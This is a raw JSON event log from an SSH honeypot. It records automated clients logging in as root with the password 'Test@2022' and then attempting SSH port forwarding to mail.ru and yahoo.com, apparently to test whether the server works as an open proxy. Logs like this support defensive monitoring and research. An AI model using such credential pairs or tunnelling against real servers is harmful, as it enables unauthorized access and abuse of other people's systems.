{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":14444,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:14444","sensor":"my-vps","timestamp":"2025-08-31T03:47:44.932367Z","session":"32f10de3ab6f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:44.982651Z","src_ip":"77.83.207.83","session":"32f10de3ab6f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:45.033545Z","src_ip":"77.83.207.83","session":"32f10de3ab6f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":63195,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d85f27ba5c6","protocol":"ssh","message":"New connection: 77.83.207.83:63195 (1.2.3.4:22) [session: 6d85f27ba5c6]","sensor":"my-vps","timestamp":"2025-08-31T03:47:45.082210Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:45.082897Z","src_ip":"77.83.207.83","session":"6d85f27ba5c6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:45.132809Z","src_ip":"77.83.207.83","session":"6d85f27ba5c6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:45.380343Z","src_ip":"77.83.207.83","session":"6d85f27ba5c6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10948,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10948","sensor":"my-vps","timestamp":"2025-08-31T03:47:45.431793Z","session":"6d85f27ba5c6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:45.481518Z","src_ip":"77.83.207.83","session":"6d85f27ba5c6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":6989,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:6989","sensor":"my-vps","timestamp":"2025-08-31T03:47:45.624049Z","session":"6d85f27ba5c6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:45.673845Z","src_ip":"77.83.207.83","session":"6d85f27ba5c6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":17367,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:17367","sensor":"my-vps","timestamp":"2025-08-31T03:47:45.816182Z","session":"6d85f27ba5c6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:45.866064Z","src_ip":"77.83.207.83","session":"6d85f27ba5c6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:45.916978Z","src_ip":"77.83.207.83","session":"6d85f27ba5c6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":63271,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef78d35d98f7","protocol":"ssh","message":"New connection: 77.83.207.83:63271 (1.2.3.4:22) [session: ef78d35d98f7]","sensor":"my-vps","timestamp":"2025-08-31T03:47:45.965724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:45.975893Z","src_ip":"77.83.207.83","session":"ef78d35d98f7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:46.016276Z","src_ip":"77.83.207.83","session":"ef78d35d98f7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:46.264346Z","src_ip":"77.83.207.83","session":"ef78d35d98f7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":21148,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:21148","sensor":"my-vps","timestamp":"2025-08-31T03:47:46.314998Z","session":"ef78d35d98f7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:46.365349Z","src_ip":"77.83.207.83","session":"ef78d35d98f7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":23862,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:23862","sensor":"my-vps","timestamp":"2025-08-31T03:47:46.508039Z","session":"ef78d35d98f7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:46.557915Z","src_ip":"77.83.207.83","session":"ef78d35d98f7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":26695,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:26695","sensor":"my-vps","timestamp":"2025-08-31T03:47:46.700054Z","session":"ef78d35d98f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34020,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8e9fbe70648","protocol":"ssh","message":"New connection: 212.227.235.229:34020 (1.2.3.4:22) [session: b8e9fbe70648]","sensor":"my-vps","timestamp":"2025-08-31T03:47:46.748119Z"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:46.749959Z","src_ip":"77.83.207.83","session":"ef78d35d98f7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:46.800857Z","src_ip":"77.83.207.83","session":"ef78d35d98f7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":63344,"dst_ip":"1.2.3.4","dst_port":22,"session":"42eb5dcec159","protocol":"ssh","message":"New connection: 77.83.207.83:63344 (1.2.3.4:22) [session: 42eb5dcec159]","sensor":"my-vps","timestamp":"2025-08-31T03:47:46.850974Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:46.851967Z","src_ip":"77.83.207.83","session":"42eb5dcec159"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:46.902328Z","src_ip":"77.83.207.83","session":"42eb5dcec159"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:47.152858Z","src_ip":"77.83.207.83","session":"42eb5dcec159"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4442,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:4442","sensor":"my-vps","timestamp":"2025-08-31T03:47:47.205205Z","session":"42eb5dcec159"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:47.255798Z","src_ip":"77.83.207.83","session":"42eb5dcec159"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":5316,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:5316","sensor":"my-vps","timestamp":"2025-08-31T03:47:47.397058Z","session":"42eb5dcec159"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:47.447906Z","src_ip":"77.83.207.83","session":"42eb5dcec159"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:47:47.459701Z","src_ip":"212.227.235.229","session":"b8e9fbe70648"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:47:47.460369Z","src_ip":"212.227.235.229","session":"b8e9fbe70648"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":30603,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:30603","sensor":"my-vps","timestamp":"2025-08-31T03:47:47.588780Z","session":"42eb5dcec159"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:47.639318Z","src_ip":"77.83.207.83","session":"42eb5dcec159"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:47.690794Z","src_ip":"77.83.207.83","session":"42eb5dcec159"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":63431,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f950086acc9","protocol":"ssh","message":"New connection: 77.83.207.83:63431 (1.2.3.4:22) [session: 1f950086acc9]","sensor":"my-vps","timestamp":"2025-08-31T03:47:47.739068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:47.749312Z","src_ip":"77.83.207.83","session":"1f950086acc9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:47.789652Z","src_ip":"77.83.207.83","session":"1f950086acc9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:48.038112Z","src_ip":"77.83.207.83","session":"1f950086acc9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7589,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:7589","sensor":"my-vps","timestamp":"2025-08-31T03:47:48.089421Z","session":"1f950086acc9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:48.139454Z","src_ip":"77.83.207.83","session":"1f950086acc9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5899,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:5899","sensor":"my-vps","timestamp":"2025-08-31T03:47:48.280014Z","session":"1f950086acc9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:48.329794Z","src_ip":"77.83.207.83","session":"1f950086acc9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":621,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:621","sensor":"my-vps","timestamp":"2025-08-31T03:47:48.472277Z","session":"1f950086acc9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:48.522280Z","src_ip":"77.83.207.83","session":"1f950086acc9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:48.572759Z","src_ip":"77.83.207.83","session":"1f950086acc9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":63525,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec8c8974f607","protocol":"ssh","message":"New connection: 77.83.207.83:63525 (1.2.3.4:22) [session: ec8c8974f607]","sensor":"my-vps","timestamp":"2025-08-31T03:47:48.621754Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:48.622797Z","src_ip":"77.83.207.83","session":"ec8c8974f607"}
